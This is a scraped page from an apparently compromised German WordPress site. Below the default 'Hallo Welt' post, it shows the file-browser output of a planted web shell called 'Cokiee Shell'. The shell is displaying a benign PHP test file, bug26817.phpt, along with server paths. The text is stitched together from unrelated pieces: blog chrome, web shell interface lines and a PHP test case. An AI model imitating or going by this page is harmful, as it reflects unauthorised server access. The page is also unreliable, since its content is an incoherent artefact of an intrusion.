Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/strings/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/strings/bug26817.phpt |
--TEST-- Bug #26817 (http_build_query() did not handle private & protected object properties) --FILE-- <?php class test { protected $foo; private $bar; public $test; function foo() { $this->bar = 'meuh'; $this->foo = 'lala'; $this->test = 'test'; var_dump(http_build_query($this)); } } $obj = new test(); $obj->foo(); var_dump(http_build_query($obj)); ?> --EXPECT-- string(27) "foo=lala&bar=meuh&test=test" string(9) "test=test"
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare